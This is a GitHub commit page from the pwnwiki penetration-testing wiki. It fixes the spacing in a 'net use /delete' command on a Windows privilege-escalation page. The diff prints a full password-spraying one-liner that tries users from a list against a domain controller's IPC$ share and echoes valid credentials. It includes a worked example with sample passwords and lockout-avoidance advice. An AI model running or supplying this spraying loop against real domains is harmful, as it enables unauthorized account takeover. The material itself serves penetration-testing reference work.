Skip to content

Commit cb3fc47

Browse files
tekwizz123tekwizz123
authored
Merge pull request pwnwiki#112 from nixawk/patch-windows-privilege_password_spraying
Fix [net use / delete] spacing issue in command
2 parents d888cfa + f956b02 commit cb3fc47

File tree

1 file changed

+3
-3
lines changed

1 file changed

+3
-3
lines changed

privesc/windows/index.md

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -38,14 +38,14 @@ This section taken from Skoudis / Strand Pillage the Village redux webcast
3838
* Locally - `net user /domain > users`
3939

4040
### Simple `for` loop to try one or two passwords across all the users on the domain
41-
* **Command with arguments**: `@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\[DOMAINCONTROLLER]\IPC$ /user:[DOMAIN]\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use / delete \\[DOMAINCONTROLLER]\IPC$ > NUL`
41+
* **Command with arguments**: `@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\[DOMAINCONTROLLER]\IPC$ /user:[DOMAIN]\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\[DOMAINCONTROLLER]\IPC$ > NUL`
4242
* **Formatted for readability:
4343
```
4444
@FOR /F %n in (users.txt) DO
4545
@FOR / F %p in (pass.txt) DO
4646
@net use \\[DOMAINCONTROLLER]\IPC$ /user:[DOMAIN]\%n %p 1>NUL 2>&1 &&
4747
@echo [*] %n:%p &&
48-
@net use / delete \\[DOMAINCONTROLLER]IPC$ > NULL
48+
@net use /delete \\[DOMAINCONTROLLER]IPC$ > NULL
4949
```
5050
* **Description**: a for loop that iterated over all the users in `users.txt` and tries all the passwords listed in `pass.txt`. Can be used with the `net user /domain` command listed above for every user in the domain.
5151
* **Note**: To prevent account lockout, the amount of passwords in `pass.txt` should be kept very small--one or two at most.
@@ -54,7 +54,7 @@ This section taken from Skoudis / Strand Pillage the Village redux webcast
5454
* `net user /domain > DomainUsers.txt`
5555
* `echo "Password1" >> pass.txt`
5656
* `echo "1q2w3e4r" >> pass.txt`
57-
* `@FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use / delete \\COMPANYDC1\IPC$ > NUL`
57+
* `@FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL`
5858

5959
# Tools
6060

0 commit comments

Comments
 (0)